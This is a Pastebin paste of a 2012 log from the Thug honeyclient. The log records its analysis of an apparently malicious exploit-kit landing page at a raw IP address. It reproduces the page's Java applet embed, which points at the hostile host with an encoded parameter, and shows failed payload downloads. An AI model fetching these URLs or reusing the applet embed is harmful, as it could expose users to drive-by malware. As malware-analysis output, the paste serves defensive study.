Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- python thug.py -r http://www.qi-inc.com/ABtH6Xj/index.html -p http://192.168.186.6:8888 94.75.207.165/links/marked-alter.php
- [2012-09-27 19:40:58] [HTTP] URL: http://94.75.207.165/links/marked-alter.php (Status: 200, Referrer: http://www.qi-inc.com/ABtH6Xj/index.html)
- [2012-09-27 19:40:58] <object classid="clsid:8AD9C840-044E-11D1-B3E9-00805F499D93" codebase="http://java.sun.com/update/1.6.0/jinstall-6u60-windows-i586.cab#Version=6,0,0,0" height="200" width="200"><param name="CODE" value="hw"></param><param name="ARCHIVE" value="http://94.75.207.165/links/marked-alter.php?qqhlh=350a36370b&dtjl=3d44&iib=kojp&ovp=zxxeoykv"></param><param name="type" value="application/x-java-applet;version=1.6"></param><param name="uid" value="N0b0909041f31313e2b3c29423c271c293c3734423143323a111931231a44113500221a430935443c040b043d122c3908421c1a083408291c28023635391c4208081c2808341c1a0808080808421c081c290232391c27021109394002430a3919"></param></object>
- [2012-09-27 19:40:58] [Shellcode Analysis] URL Detected: http://java.sun.com/update/1.6.0/jinstall-6u60-windows-i586.cab#Version=6,0,0,0
- [2012-09-27 19:41:00] [HTTP] URL: http://java.sun.com/update/1.6.0/jinstall-6u60-windows-i586.cab#Version=6,0,0,0 (Status: 404, Referrer: http://94.75.207.165/links/marked-alter.php)
- [2012-09-27 19:41:00] [HTTP Redirection (Status: 301)] Content-Location: http://java.sun.com/update/1.6.0/jinstall-6u60-windows-i586.cab#Version=6,0,0,0 --> Location: http://javadl-esd.sun.com/update/1.6.0/jinstall-6u60-windows-i586.cab
- [2012-09-27 19:41:00] FileNotFoundError: http://java.sun.com/update/1.6.0/jinstall-6u60-windows-i586.cab#Version=6,0,0,0
- [2012-09-27 19:41:00] <param name="CODE" value="hw"></param>
- [2012-09-27 19:41:00] <param name="ARCHIVE" value="http://94.75.207.165/links/marked-alter.php?qqhlh=350a36370b&dtjl=3d44&iib=kojp&ovp=zxxeoykv"></param>
- [2012-09-27 19:41:00] [HTTP] URL: http://94.75.207.165/links/marked-alter.php?qqhlh=350a36370b&dtjl=3d44&iib=kojp&ovp=zxxeoykv (Status: 502, Referrer: http://94.75.207.165/links/marked-alter.php)
- [2012-09-27 19:41:00] Saving remote content at http://94.75.207.165/links/marked-alter.php?qqhlh=350a36370b&dtjl=3d44&iib=kojp&ovp=zxxeoykv (MD5: d41d8cd98f00b204e9800998ecf8427e)
- [2012-09-27 19:41:00] [HTTP] URL: http://94.75.207.165/links/marked-alter.php?qqhlh=350a36370b&dtjl=3d44&iib=kojp&ovp=zxxeoykv (Status: 502, Referrer: http://94.75.207.165/links/marked-alter.php)
- [2012-09-27 19:41:00] Saving remote content at http://94.75.207.165/links/marked-alter.php?qqhlh=350a36370b&dtjl=3d44&iib=kojp&ovp=zxxeoykv (MD5: d41d8cd98f00b204e9800998ecf8427e)
- [2012-09-27 19:41:00] <param name="type" value="application/x-java-applet;version=1.6"></param>
- [2012-09-27 19:41:00] <param name="uid" value="N0b0909041f31313e2b3c29423c271c293c3734423143323a111931231a44113500221a430935443c040b043d122c3908421c1a083408291c28023635391c4208081c2808341c1a0808080808421c081c290232391c27021109394002430a3919"></param>
- [2012-09-27 19:41:01] Saving log analysis at ../logs/ed578df76b9103ffce15f990730ce5fa/20120927194056
Advertisement
Add Comment
Please, Sign In to add comment